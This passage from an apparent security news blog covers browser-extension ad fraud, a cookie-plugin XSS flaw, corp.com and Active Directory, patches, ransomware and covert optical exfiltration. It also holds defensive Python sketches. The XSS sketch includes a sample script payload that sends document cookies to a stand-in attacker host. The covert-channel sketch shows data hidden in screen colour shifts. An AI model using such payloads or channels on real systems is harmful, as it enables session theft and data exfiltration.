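        return names.setdefault(word, f"id{len(names)}")
    return IDENT.sub(sub, src)

# Two hypothetical extension snippets with the same structure:
a = "function stealData(u){ return send(u); }"
b = "function collectInfo(x){ return post(x); }"
print(fingerprint(a) == fingerprint(b))  # True – same skeleton, different names
```

Real-world similarity analysis is fuzzier than this (think token hashing or abstract syntax trees), but the principle – compare structure, not names – is the same.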

Another troubling similarity was the number of permissions requested – enough to allow the extensions to access browsing data and to run on any website visited over HTTPS.

Working together, Kaya and Duo Security eventually identified 70 extensions that seemed to be related to one another. All contacted similar command and control networks and seemed to have been designed to detect and counteract sandbox analysis.

Ad fraud was the biggest activity – contacting domains without the user being aware – as well as redirecting users to malware and phishing domains.


Google forced to reveal anonymous reviewer’s details

By Danny Bradbury

It’s a small business’s worst nightmare: someone leaves a review on a popular site trashing your company, and they do it anonymously. That’s what happened to Mark Kabbabe, who runs a tooth whitening business in Melbourne, Australia. Last week, a court forced Google to reveal the details of an anonymous poster who published a bad review of his business.

According to the court judgement, the anonymous poster used the pseudonym CBsm 23 to publish a review on Google about a procedure they had undergone at Kabbabe’s clinic. The review said that the dentist made the whole experience “extremely awkward and uncomfortable”, claiming that the procedure was a “complete waste of time” and was not “done properly”. It seemed like Kabbabe “had never done this before”, said the review, adding that other patients had “been warned!” and should “STAY AWAY”. Ouch.

Kabbabe contacted Google in November 2019, according to the court order, asking it to take down the review, but Google refused. He mailed again on 5 February, asking for information about the poster, but Google replied that:

We do not have any means to investigate where and when the ID was created.

This was enough for Justice Murphy, presiding over the case, who has ordered that Google hand over the anonymous poster’s details. In his court ruling, he said:

Dr Kabbabe is not required to make inquiries that will be fruitless and in my view he has done enough.

He added:

…notwithstanding Google’s response, I consider that Google is likely to have or have had control of a document or thing that would help ascertain that description of the prospective respondent CBsm 23…


February 14, 2020 »

Cookie-nabbing app could have served users side helping of XSS

By Danny Bradbury

A popular GDPR compliance WordPress plugin vendor has patched a flaw that rendered both site visitors and admins vulnerable to cookie-stealing cross-site scripting (XSS) attacks.

The GDPR Cookie Consent plugin, created by WebToffee, claims over 700,000 users. The plug-in is a notification app that begs you to accept cookies when you first visit a WordPress site. Website owners use tools like this to stay compliant with GDPR, which points to cookies as a form of online identifier and therefore subject to its consent rules.

While the GDPR Cookie Consent plugin asks you if you’d mind accepting cookies, it doesn’t ask you if you’d like a dollop of XSS with them too. Until this week, that’s what visitors to pages containing the plugin might have been vulnerable to.

The flaw enabled an XSS attack and elevation of privilege in versions 1.8.2 and earlier, said a blog post by The Ninja Technologies Network, which sells web application firewalls to protect WordPress sites.

According to Wordfence, the cause of the vulnerability was an AJAX endpoint used in the administration section of the plugin (AJAX uses JavaScript and XML to deliver web page functionality). This exposed three functions to blog subscribers that should only have been available to admins: get_policy_pageid, autosave_contant_data (“contant” is a typo in the code itself), and save_contentdata. The first just returns a post ID for the plugin’s cookie policy page and isn’t really significant, Wordfence said.

The second defines the standard content for that page and is more worrisome. Because the HTML is unfiltered, an attacker could alter it to contain JavaScript code. That means they could use it to deliver an XSS payload to any user that viewed it on its /cli-policy-preview/ page.
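The core defence against that kind of stored XSS is simple enough to sketch: escape (or strictly sanitize) stored content before echoing it back into a page. This toy Python sketch is our own illustration – the real plugin is PHP, and the real fix also involves restricting those AJAX endpoints to admins – but it shows why escaping renders an injected script inert:

```python
import html

def render_policy_preview(user_supplied):
    """Sketch: escape stored content before echoing it into a page,
    so any <script> an attacker saved is displayed as text, not run."""
    return f"<div class='policy'>{html.escape(user_supplied)}</div>"

# Hypothetical cookie-stealing payload an attacker might save:
payload = "<script>location='https://evil.example/?c='+document.cookie</script>"
safe = render_policy_preview(payload)
print("<script>" not in safe)  # True – the tag has been neutralized
```

Escaping on output is the belt; checking the caller’s capabilities before accepting the content in the first place is the braces. The plugin needed both.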


Suspect who refused to decrypt hard drives released after four years

By John E Dunn

The contentious case of a man held in custody since 2015 for refusing to decrypt two hard drives appears to have reached a resolution of sorts after the US Court of Appeals ordered his release.

Former Philadelphia police sergeant Francis Rawls was arrested in September 2015, when the external hard drives were seized along with other computers from his home.

Based on forensic analysis of his download habits and the testimony of his sister, police believed the drives contained child abuse imagery, but they were unable to prove that without access to the drives.

Rawls claimed he did not know or had forgotten the passcodes, while his lawyers argued that, on principle, forcing him to reveal them violated his Fifth Amendment right against self-incrimination.

Rawls was ruled in civil contempt of court, and in 2017 a second court rejected the Fifth Amendment argument.

Rawls was never formally charged with a crime, and a lot seems to have hinged on whether he should be treated as a suspect or a witness. If Rawls was considered a witness, then asking him to provide information that could be used against him amounts, in effect, to demanding self-incriminating testimony.


Facebook ices in-app dating in EU after questions from regulator

By Lisa Vaas

Facebook has delayed the rollout of its new dating feature in Europe, after officers from the Irish data regulator popped by to ask why Facebook hadn’t checked in about it earlier or provided the necessary data privacy paperwork.

The Irish Data Protection Commission (DPC) said on Wednesday that Facebook Ireland hadn’t bothered to contact the DPC about its intention to roll out the new dating feature in the EU until Monday, 3 February. That’s not much notice, the DPC said, given that this was the first it had heard about the feature, and given that Facebook planned to roll it out just 10 days later.

We were very concerned that this was the first that we’d heard from Facebook Ireland about this new feature […]. Our concerns were further compounded by the fact that no information/documentation was provided to us on 3 February in relation to the Data Protection Impact Assessment [DPIA] or the decision-making processes that were undertaken by Facebook Ireland.

Facebook first started talking about invading Tinder’s space with a dating feature for meeting non-friends back in May 2018 at its F8 developer conference. Then, it launched the in-app dating feature – called Facebook Dating – in September 2019 in the US, after having previously premiered it in 19 other countries, including Colombia, Canada, and Thailand.


Self-driving car dataset missing labels for pedestrians, cyclists

By Lisa Vaas

A popular self-driving car dataset for training machine-learning systems – one that’s used by thousands of students to build an open-source self-driving car – contains critical errors and omissions, including missing labels for hundreds of images of bicyclists and pedestrians.

Machine learning models are only as good as the data on which they’re trained. But when researchers at Roboflow, a firm that writes boilerplate computer vision code, hand-checked the 15,000 images in Udacity Dataset 2, they found problems with 4,986 – that’s 33% – of those images.

From a writeup of Roboflow’s findings, which were published by founder Brad Dwyer on Tuesday:

Amongst these [problematic data] were thousands of unlabeled vehicles, hundreds of unlabeled pedestrians, and dozens of unlabeled cyclists. We also found many instances of phantom annotations, duplicated bounding boxes, and drastically oversized bounding boxes.

Perhaps most egregiously, 217 (1.4%) of the images were completely unlabeled but actually contained cars, trucks, street lights, and/or pedestrians.

Junk in, junk out. In the case of the AI behind self-driving cars, junk data could literally lead to deaths. This is how Dwyer describes how bad/unlabeled data propagates through a machine learning system:

Generally speaking, machine learning models learn by example. You give it a photo, it makes a prediction, and then you nudge it a little bit in the direction that would have made its prediction more ‘right’. Where ‘right’ is defined as the ‘ground truth’, which is what your training data is.

If your training data’s ground truth is wrong, your model still happily learns from it, it’s just learning the wrong things (eg ‘that blob of pixels is *not* a cyclist’ vs ‘that blob of pixels *is* a cyclist’)

Neural networks do an Ok job of performing well despite *some* errors in their training data, but when 1/3 of the ground truth images have issues it’s definitely going to degrade performance.
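You can see the ceiling that label noise imposes with a toy simulation (our own illustration, not Roboflow’s code): even a model that predicts every example perfectly can’t score above one minus the noise rate when graded against corrupted ground truth.

```python
import random

def accuracy_with_label_noise(noise_rate, n=10_000, seed=42):
    """Toy illustration: a 'perfect' model that always predicts the true
    class, scored against ground truth in which a fraction of labels has
    been flipped. Measured accuracy is capped near 1 - noise_rate."""
    rng = random.Random(seed)
    truth = [rng.randint(0, 1) for _ in range(n)]
    labels = [1 - t if rng.random() < noise_rate else t for t in truth]
    correct = sum(pred == label for pred, label in zip(truth, labels))
    return correct / n

print(round(accuracy_with_label_noise(1 / 3), 2))  # roughly 0.67
```

And that’s the optimistic case: in training (rather than evaluation), the model actively learns the wrong answers, so the damage compounds.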

Corp.com is up for sale – check your Active Directory settings!

By Danny Bradbury

An old domain that has lain dormant for 26 years is going on sale – and the results could be catastrophic for enterprises with poorly configured Active Directory setups.

Brian Krebs reports that Mike O’Connor, a domain prospector who registered corp.com in 1994, wants to sell the domain for $1.7 million as he simplifies his estate. Most other domains would simply be a useful way to generate web traffic, but corp.com is different.

The problem lies with Microsoft’s Active Directory. This product, which provides identity management services across most of the world’s enterprises, handles internal URLs using its own domain naming system which is connected to but separate from the public domain naming system (DNS).

Because Active Directory controls what happens inside the company network, the company can host its services on whatever domains it likes. So, let’s say that your company hosts all of the services that its employees can access from inside the company network on an internal domain – corp.example.com, say.

The company HR portal might then be accessible via a Fully Qualified Domain Name (FQDN) such as hr-portal.corp.example.com, assuming corp.example.com was your company’s internal domain. Active Directory ensures that people inside the company network who type that name into their browser are sent to the company HR portal.

No one wants to type in the full name for a server that they visit every day from inside the company network. So, Windows makes that easier too, using a feature called DNS devolution. It works by appending portions of the Active Directory domain to an unqualified domain name. In our example, you could just type hr-portal, and Windows would try appending the rest of the domain name to see if it gets a hit.

Windows machines use a search list to tell them what to use during DNS devolution. The search list is either configured in the registry or sometimes declared explicitly in a file. As section 3.1 of this ICANN Security and Stability Advisory Committee document on DNS search list processing points out, search list processing is affected by factors including the computer’s hostname (which you’ll be asked for when setting up business versions of Windows).
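To see how devolution walks down the suffix – and why a generic domain at the bottom of that walk is dangerous – here’s a toy Python sketch (our own illustration of the behaviour described above, not Microsoft’s actual resolver code). The internal domain here is a hypothetical example:

```python
def devolution_candidates(name, primary_suffix, floor=2):
    """Toy DNS devolution: append the primary DNS suffix to an
    unqualified name, then keep stripping the leftmost label of the
    suffix until only `floor` labels remain."""
    labels = primary_suffix.split(".")
    candidates = []
    while len(labels) >= floor:
        candidates.append(f"{name}.{'.'.join(labels)}")
        labels = labels[1:]  # devolve one level
    return candidates

# A machine on the hypothetical AD domain ad.internal.corp.com:
print(devolution_candidates("hr-portal", "ad.internal.corp.com"))
# ['hr-portal.ad.internal.corp.com',
#  'hr-portal.internal.corp.com',
#  'hr-portal.corp.com']
```

The last candidate is the problem: a machine that devolves all the way down ends up asking the public corp.com – whoever owns it – where the HR portal lives.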


Firefox six-weekly security fixes are out – get them now!

By Paul Ducklin

Mozilla’s own “patch Tuesday” for Firefox happened this week.

Rather than patching once a calendar month, Mozilla goes for every sixth Tuesday – or every 42 days, which we call Fortytwosday in a hat-tip to HHGttG.

This update takes the regular build of Firefox to 73.0, while the long-term release, which includes security fixes but not feature updates, goes to 68.5.0esr.

ESR is short for Extended Support Release, and if you want to know which regular release it matches up to for security patches, just add the leftmost two numbers together, and notice that 68+5 = 73.

The good news is that none of the security holes fixed in this update seem to be what are known as zero-day vulnerabilities, which is the industry term for bugs that the crooks figure out first.

(The name zero day reflects the fact that even if you are the sort of person who patches as soon as you can, there would have been zero days on which you could have been ahead of the crooks.)


IE zero day and heap of RDP flaws fixed in February Patch Tuesday

By John E Dunn

Weeks after the world first got wind of it, Microsoft has finally patched the Internet Explorer (IE) zero-day flaw the company said in January was being used in “limited targeted attacks”.

The fix is part of the February Patch Tuesday update that features a record 99 security vulnerabilities including 12 marked as ‘critical’ and 87 ‘important’.

The first indication of the IE zero-day, now identified as CVE-2020-0674, appeared when Mozilla fixed a very similar issue in Firefox on 8 January, less than two days after the appearance of version 72.

The attacks were reported to Mozilla by a third party which, in a since-deleted reference, mentioned that the same issue also affected IE. On 17 January, Microsoft issued its own alert regarding the Scripting Engine memory corruption flaw, citing IE’s Enhanced Security Configuration protection as mitigation against attacks.

This matters because IE code is buried inside Windows 10, which means it presents a risk even to those not using it. In the last year, IE has had other similar troubles, including CVE-2019-1367, a zero-day in September, and a proof-of-concept vulnerability reported in April.

And that’s not all – CVE-2020-0673, CVE-2020-0674, CVE-2020-0710, CVE-2020-0711, CVE-2020-0712, CVE-2020-0713, and CVE-2020-0767 are all Scripting Engine memory corruption issues connected to Edge and IE browsers.


Google to force Nest users to turn on 2FA

By Lisa Vaas

Nest owners, if you aren’t already flying with two-factor authentication (2FA) on your accounts, get ready for Google to push you into spreading those security wings.

On Tuesday – which, appropriately enough, was Safer Internet Day – Google announced that in the spring (or in the fall, for those in the Southern Hemisphere), it will start forcing users of its Nest webcams and other products to use 2FA to secure their accounts.

Nest users who haven’t yet enrolled in the 2FA option or migrated to a Google account will be required to take an extra step by verifying their identity via email, Google said in a blog post. When a new login hits your Nest account, you’ll get a login notification email containing a six-digit verification code. Without that code, anybody trying to get into your account will be locked out.
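For the curious, generating a code like that is straightforward – here’s a minimal Python sketch (our own illustration; Google hasn’t published its actual scheme) using a cryptographically strong random source so the codes can’t be predicted:

```python
import secrets

def make_login_code():
    """Sketch of a six-digit one-time login code: drawn uniformly from
    000000-999999 with a CSPRNG, then zero-padded to six digits."""
    return f"{secrets.randbelow(10**6):06d}"

code = make_login_code()
print(len(code), code.isdigit())  # 6 True
```

The zero-padding matters: without it, roughly one code in ten would be shorter than six digits and the scheme would leak a little information about the value.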

That should help with, say, keeping creeps from talking to your baby through a Nest security cam, or trying to crank up your Nest thermostat to tropical levels, both of which have happened to people who say they weren’t aware that 2FA is an option.


This will greatly reduce the likelihood of an unauthorized person gaining access to your Nest account.

Google started sending out login notifications for Nest accounts in December 2019. Sometimes, simply being told that somebody’s logged into your account is all it takes to spot suspicious activity, Google said:

Every time someone on your account logs in you’ll receive an email notification. That way if it wasn’t you, you can take action immediately.


February 12, 2020 »

Data about inmates and jail staff spilled by leaky prison app

By Lisa Vaas

Inmates’ and correctional facilities employees’ data has been sloshed onto the web, unencrypted and unsecured, in yet another instance of a misconfigured cloud storage bucket.

Security researchers at vpnMentor came across the leak on 3 January during a web-mapping project that was scanning a range of Amazon S3 addresses to look for open holes in systems.

The leaky bucket belongs to JailCore, a cloud-based app meant to manage correctional facilities, including by helping to ensure better compliance with insurance standards by doing things like tracking inmates’ medications and activities. That means that the app handles personally identifiable information (PII) that includes detainees’ names, mugshots, medication names, and behaviors: going to the lavatory, sleeping, pacing, or cursing, for example.

JailCore also tracks correctional officers’ names, sometimes their signatures, and their personally filled out observational reports on the detainees.

Some of the PII is meant to be freely available to the public: details such as detainee names, dates of birth and mugshots are already publicly available from most state or county websites within rosters of current inmates. But another portion of the data is not: that portion includes specific medication information and additional sensitive data, vpnMentor says, such as the PII of correctional officers.

JailCore closed down the data leak between 15 and 16 January: 10 or 11 days after vpnMentor notified it about the breach (and about the same time that the security firm reached out to the Pentagon about it). The company initially refused to accept vpnMentor’s disclosure findings, the firm said.


US charges four Chinese military members with Equifax hack

By Lisa Vaas

The US has charged the Chinese military with plundering Equifax in 2017.

The Justice Department (DOJ) on Monday released a nine-count indictment that accused four members of the People’s Liberation Army (PLA) of being hackers behind the breach, which was one of the largest in US history.

The breach exposed millions of names and dates of birth, taxpayer ID numbers, physical addresses, and other personal information that could lead to identity theft and fraud. Besides the original estimate of 145.5 million Americans who were affected, the breach also hit 15.2 million Brits and some 100,000 Canadians.

The indictment charged the four with a three-month campaign during which they allegedly hacked into computers of the credit-reporting agency and siphoned off the sensitive financial data and other personally identifiable information (PII) from all those people.

The accused are Wu Zhiyong, Wang Qian, Xu Ke, and Liu Lei: all members of the PLA’s 54th Research Institute, which is part of the Chinese military.

How they allegedly pulled it off

According to the indictment, the four allegedly pried open Equifax by exploiting a vulnerability in the Apache Struts Web Framework software used by the credit reporting agency’s online dispute portal.

We already knew it was done via a web app vulnerability and that it was a months-old Struts vulnerability: specifically, a nasty server-side remote code execution (RCE) bug made known to the public in March 2017.


Mozilla issues final warning to websites using TLS 1.0

By John E Dunn

Sometime this March, the Firefox, Chrome, Safari and Edge browsers will start throwing up warnings when users visit websites that only support Transport Layer Security (TLS) versions 1.0 or 1.1.

Announced in October 2018 as part of a joint plan to phase out support, the implications for any holdout sites are stark – enable the later TLS 1.2 or, ideally, 1.3, or face having no traffic.

According to the latest Mozilla reminder, visitors using Firefox will start seeing a ‘Secure Connection Failed’ message, with an accompanying SSL_ERROR_UNSUPPORTED_VERSION error code for anyone in doubt.

Initially, it will be possible to override this but only for so long. Sooner rather than later, Mozilla says that too will disappear:

We’re committed to completely eradicating weak versions of TLS because at Mozilla we believe that user security should not be treated as optional.

Other browsers will follow suit, with the Chrome browser having adopted ‘Your connection to this site is not fully secure’ messages last month with full blocking due to begin in March.


February 11, 2020 »

5 tips for businesses on Safer Internet Day

By Paul Ducklin

Safer Internet Day is here!

Note that it’s more than just One Safe Internet Day, where you spend 24 hours taking security seriously, only to fall back on bad habits the day after.

As the old saying goes, “Cybersecurity is a journey, not a destination,” and that’s why we have SAFER internet day – it’s all about getting BETTER at cybersecurity, no matter how safe you think you are already.

So here are five things you can do in your business, regardless of its size, to help you and your colleagues keep ahead of the cybercrooks.


We’ve won part of this battle already, because most businesses these days do install security patches.

At least, they install updates eventually. But there are still many organizations out there that take their time about it, putting off updates for weeks or even months “in case something goes wrong”.

The problem is that once crooks know about new security holes, they don’t put off using them – so the longer you lag behind, the more vulnerable your business becomes. Learn how to test updates quickly – you can start with one computer and make notes from there – and have a plan for rolling back in the rare event that something does go wrong.


Google Chrome to start blocking downloads served via HTTP

By John E Dunn

Google has announced a timetable for phasing out insecure file downloads in the Chrome browser, starting with desktop version 81 due out next month.

Known in jargon as ‘mixed content downloads’, these are files such as software executables, documents and media files offered from secure HTTPS websites over insecure HTTP connections.

This is a worry because a user seeing the HTTPS padlock on a site visited using Chrome might assume that any downloads it offers are also secure (HTTP sites offering downloads are already marked ‘not secure’).
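The pattern Chrome is hunting for is easy enough to spot yourself. Here’s a toy Python sketch (our own illustration, not Google’s detection code) that flags plain-http links in a page that was itself served over HTTPS:

```python
from html.parser import HTMLParser

class MixedDownloadFinder(HTMLParser):
    """Sketch: collect anchor hrefs that point at plain-http resources –
    the 'mixed content download' pattern Chrome is phasing out."""
    def __init__(self):
        super().__init__()
        self.insecure = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href", "")
            if href.startswith("http://"):
                self.insecure.append(href)

# Hypothetical snippet from a page served over HTTPS:
page = ('<a href="https://example.com/setup.exe">ok</a>'
        '<a href="http://example.com/setup.exe">bad</a>')
finder = MixedDownloadFinder()
finder.feed(page)
print(finder.insecure)  # ['http://example.com/setup.exe']
```

The second link is the one an on-path attacker could tamper with, padlock or no padlock – which is exactly why Chrome will first warn about it and later block it.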

That, of course, is a risky assumption, as Google’s announcement points out:

Insecurely-downloaded files are a risk to users’ security and privacy. For instance, insecurely downloaded programs can be swapped out for malware by attackers, and eavesdroppers can read users’ insecurely-downloaded bank statements.

Google will introduce this change gradually rather than all at once, at first offering warnings about executable downloads via HTTP in versions 81 and 82 of the desktop browser.

From version 83, due in June, these will be blocked outright and Chrome will start offering warnings for archive files such as .zip.

In subsequent versions, the same warn-and-block process will start to apply for downloads such as .doc and PDFs, images, videos and music files until, by Chrome version 86 in October, all downloads via HTTP will be blocked.

Mobile versions of Chrome will use the same timetable except that each milestone will apply one version later than for the desktop version.

Enterprise and education customers will be able to disable the policy on a per-site basis using the InsecureContentAllowedForUrls policy, Google said.


Facebook encrypted messaging will ‘create hiding places for child abuse’

By Lisa Vaas

Last year, Facebook announced that it would stitch the technical infrastructure of all of its chat apps – Messenger, WhatsApp and Instagram – together so that users of each app can talk to each other more easily.

The plan includes slathering the end-to-end encryption of WhatsApp – which keeps anyone, including law enforcement and even Facebook itself, from reading the content of messages – onto Messenger and Instagram. At this point, Facebook Messenger supports end-to-end encryption only in its “Secret Conversations” mode, which is off by default and has to be enabled for every chat. Instagram has no end-to-end encryption on its chats at all.

“As you would expect, there is a lot of discussion and debate as we begin the long process of figuring out all the details of how this will work,” Facebook has said – including, of course, the fact that law enforcement would be shut out of viewing messages on yet more chat apps.

That discussion now includes an open letter, signed by 129 child protection organizations around the world and sent to CEO Mark Zuckerberg on Thursday. The groups, led by the UK’s National Society for the Prevention of Cruelty to Children (NSPCC), are urging the company to stop its plans until “sufficient safeguards” are in place.

According to news outlets that have seen the letter, it says that Facebook could be building on “years of sophisticated efforts” to protect children online, but is instead “inclined to blindfold itself.”

More from the letter:

We urge you to recognize and accept that an increased risk of child abuse being facilitated on or by Facebook is not a reasonable trade-off to make. Children should not be put in harm’s way either as a result of commercial decisions or design choices.

The NSPCC said in December 2019 that police in the UK recorded over 4,000 instances – an average of 11 per day – where Facebook apps were used in child abuse image and online child sexual offenses during the prior year.


February 10, 2020 »

FBI director warns of sustained Russian disinformation threat

By Danny Bradbury

Russia is still using social media in a sustained campaign to dabble in US affairs, according to FBI director Chris Wray.

Wray, speaking at a House Judiciary Hearing on FBI Oversight on Wednesday 5 February, said that Russia is still engaged in an “information warfare” campaign against the US, according to a report by the Associated Press.

Wray singled out disinformation campaigns as a particular threat to the US in his testimony, warning:

The goal of these foreign influence operations directed against the United States is to spread disinformation, sow discord, push foreign nations’ policy agendas, and ultimately undermine confidence in our democratic institutions and values.

The FBI has a three-pillar approach, Wray said, beginning with an open investigation into foreign influence activities spanning field offices around the country. Second, it works with international partners and US intelligence agencies to share information. Finally, it regularly meets with social media companies to brief them on the latest threats, sharing specific account information, he said.


Frustrated author cybersquats novelist’s website

By Danny Bradbury

If you visit the website of renowned Canadian novelist Patrick deWitt today, you’ll see a surprising message. “THIS IS NOT PATRICK DEWITT”, it says.

That’s because the domain has been taken over by a cybersquatter. Not just any cybersquatter, mind – this one has literary ambitions.

The unpublished writer apparently noticed that deWitt had let the domain lapse, and decided to register it for themselves. Clicking on the page takes you to an about section, which announces:

Patrick deWitt is an award-winning author who has written 4 best-selling novels.

This is not his site.

I have not made any films. I have not written any award-winning books.

If you want to do something that is singularly unrewarding, write a novel.

Anyway, Patrick deWitt wasn’t using this site, so rather than waste your time with a blank page, I thought I would join you here and we could share a moment.

As if that wasn’t cheeky enough, the sneaky scribe has also posted their own manuscript on the site. Called In God’s Silence, Them Devils Sang, the manuscript is described by its author as an acid western.

The news hit the internet last week, but this has been going on for a while. The first instance of the cybersquatter’s site shows up on the Wayback Machine (a site that archives snapshots of web pages) on 10 November 2018. Let’s Encrypt issued an SSL certificate for the domain on 11 July 2019, although the mysterious cybersquatter doesn’t seem to be using it as yet. As of today, the site was still using plain old HTTP.


RobbinHood – the ransomware that brings its own bug

By Paul Ducklin

Ransomware is one of the most feared cybercrime problems of the modern era.

The idea of malware that scrambles your files and demands money to get them back is not new – the first widespread attack happened back in 1989 – but the scale of the threat has changed dramatically in the last few years.

Up to about 2010 or 2011, ransomware was little more than a lab curiosity…

…until the crooks finally figured out how to extract money from their desperate victims, thanks to the anonymity (more or less) afforded by the Dark Web and the untraceable (more or less) payments offered through the use of cryptocurrencies.

Crooks such as the gang behind the Cryptolocker ransomware were able to make millions, perhaps even hundreds of millions, of dollars by infecting hundreds of thousands of users and businesses, and then demanding $300 a time to unlock each user’s files.

But that approach has changed recently, with the big-money ransomware criminals carrying out fewer but much bigger attacks.

These days, ransomware operations are very often aimed at whole networks, or even at centrally-managed collections of networks.

The idea is that the crooks are still planning to scramble hundreds or thousands of computers in an attack, but instead of blackmailing the owner of each computer to pay a few hundred dollars, they blackmail the operators of the entire network to pay a huge lump sum.

Those sums typically run from $50,000 to $5,000,000, with the victims sometimes left with little choice but to pay up because their whole business has ground to a halt, not just a few computers here and there.
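The shift in business model is easy to see with some back-of-the-envelope arithmetic. The figures below are purely illustrative (the payment rate and machine count are our assumptions, not data from any specific case), but they show why a single lump-sum demand against a paralysed business can beat thousands of small demands against individuals:

```python
# Illustrative comparison of the two ransomware business models
# described above. All numbers here are assumptions for the sake
# of the example, not figures from any real attack.

PER_USER_DEMAND = 300        # classic Cryptolocker-style demand, in USD
MACHINES_HIT = 1_000         # computers scrambled in one network attack
PAYMENT_RATE = 0.03          # assumed fraction of individuals who pay up

# Scattergun model: many small demands, most of them ignored.
scattergun_take = PER_USER_DEMAND * MACHINES_HIT * PAYMENT_RATE

# Targeted model: one lump sum, chosen from the $50k-$5M range,
# demanded from an operator whose whole business has stopped.
targeted_demand = 300_000

print(f"Scattergun: ${scattergun_take:,.0f} from {MACHINES_HIT} victims")
print(f"Targeted:   ${targeted_demand:,} from a single operator")
```

Under these assumptions the same thousand scrambled machines yield $9,000 one way and $300,000 the other, which goes some way to explaining the criminals’ change of tactics.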


Researchers transmit data covertly by altering screen brightness

By Danny Bradbury

The normal way to steal data from a compromised computer is to retrieve it over a network. If that computer isn’t connected to one, it gets a little trickier.

Researchers at Ben-Gurion University of the Negev have made a name for themselves figuring out how to get data out of air-gapped computers. They’ve dreamed up ways to communicate using speakers, blinking LEDs in PCs, infrared lights in surveillance cameras, and even computer fans.

Now, they’ve figured out a way to retrieve data from a disconnected computer by altering the colour of its LCD display’s pixels just enough for a nearby camera to pick up the change.

In a paper published this month, the researchers describe what they call an “optical covert channel” that cameras can detect but users cannot. They modulate one of the three colour components that normally combine to give each LCD pixel its hue.

Their technique adjusts the red color component in pixels on the screen by 3%, which is apparently not enough for users to notice. A camera located six metres from the 19-inch screen was nevertheless able to detect the difference.
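The encoding idea can be sketched in a few lines. This is our own illustration of the principle, not the researchers’ code: each bit of the covert message nudges the red channel of a displayed frame up by 3% (bit 1) or leaves it alone (bit 0), and a camera recovers the bits by averaging the red channel of each captured frame:

```python
DELTA = 0.03  # 3% modulation, per the paper - below human perception

def modulate_frame(frame, bit):
    """Return a copy of an RGB frame (rows of (R, G, B) pixels, 0-255)
    with the red channel raised by DELTA when bit == 1."""
    factor = 1 + DELTA if bit else 1.0
    return [[[min(255, round(r * factor)), g, b] for r, g, b in row]
            for row in frame]

def encode(frame, bits):
    """Yield one subtly modulated frame per bit of the covert message."""
    for bit in bits:
        yield modulate_frame(frame, bit)

def demodulate(frames, baseline_red):
    """Recover the bit stream: average each frame's red channel and
    threshold it halfway between the baseline and the shifted value."""
    bits = []
    threshold = baseline_red * (1 + DELTA / 2)
    for frame in frames:
        pixels = [px for row in frame for px in row]
        avg_red = sum(px[0] for px in pixels) / len(pixels)
        bits.append(1 if avg_red > threshold else 0)
    return bits
```

A real attack would also need frame synchronisation and error correction, but the core trick is just this: a per-frame shift too small for the eye, yet large enough for a camera sensor to measure.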

Optical exfiltration techniques have cropped up before, they explain, but most have been easy for users to spot. By contrast, an attacker could theoretically use this one even while someone was working at the compromised machine.

We say “theoretically” because in practice there are a lot of challenges involved in this attack. The first is that the computer has to be compromised to begin with, which for an air-gapped machine means getting physical access. You could then infect it with a USB stick – but if you’ve got that far, presumably you could just copy the data onto the stick directly.


Facebook, Google, YouTube order Clearview to stop scraping faceprints

By Lisa Vaas

Clearview AI, the facial recognition company that’s scraped the web for three billion faceprints and sold them all (or given them away) to 600 police departments so they could identify people within seconds, has received yet more cease-and-desist letters from social media giants.

The first came from Twitter. A few weeks ago, Twitter told Clearview to stop collecting its data and to delete whatever it’s got.

Facebook has also demanded that Clearview stop scraping photos because the action violates its policies, and now Google and YouTube are likewise telling the audacious startup to stop violating their policies against data scraping.

Clearview’s take on all this? Defiance. It’s got a legal right to data scraping, it says.

In an interview on Wednesday with CBS This Morning, Clearview AI founder and CEO Hoan Ton-That told listeners to trust him. The technology is only to be used by law enforcement, and only to identify potential criminals, he said.

The artificial intelligence (AI) program can identify someone by matching photos of unknown people to their online photos and the sites where they were posted. Ton-That claims that the results are 99.6% accurate.

Besides, he said, it’s his right to collect public photos to feed his facial recognition app:

There is also a First Amendment right to public information. So, the way we have built our system is to only take publicly available information and index it that way.

Not everybody agrees. Some people think that their facial images shouldn’t be gobbled up without their consent. In fact, the nation’s strictest biometrics privacy law – the Biometric Information Privacy Act (BIPA) – says doing so is illegal. Clearview is already facing a potential class action lawsuit, filed last month, for allegedly violating that law.


Update now – WhatsApp flaw gave attackers access to local files

By John E Dunn

Does WhatsApp have a lot of vulnerabilities or are there simply a lot of people looking for them?

Ask PerimeterX researcher Gal Weizman, who last year set about poking the world’s most popular messaging platform to see whether he could turn up any new weaknesses.

Sure enough, this week we learned that he uncovered a clutch of vulnerabilities that led him to a tasty cross-site scripting (XSS) flaw affecting WhatsApp desktop for Windows and macOS when paired with WhatsApp for iPhone.

Patched this week as CVE-2019-18426, it’s the sort of weakness that WhatsApp desktop users who pair with an iPhone will be glad to see the back of.

The immediate problem was caused by a gap in WhatsApp’s Content Security Policy (CSP), a security layer used to protect against common types of attack, including XSS.

Using modified JavaScript in a specially crafted message, an attacker could exploit this to feed victims phishing and malware links in weblink previews in ways that would be invisible to the victim.
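By way of illustration (this is a generic policy of our own, not WhatsApp’s actual one), a CSP is simply an HTTP response header that tells the browser where scripts and other content may legitimately come from:

```http
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'
```

A policy like this blocks inline and third-party scripts outright. Loosening it – say, by adding 'unsafe-inline' to script-src or allowing a wildcard source – is exactly the kind of gap that can give injected JavaScript room to run.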

According to Weizman, this is probably remotely exploitable, although a user would still need to click on the link for an attack to succeed.

However, it could also be used to gain read access to the local file system – that is, the ability to access and open files – and, potentially, to achieve remote code execution (RCE).

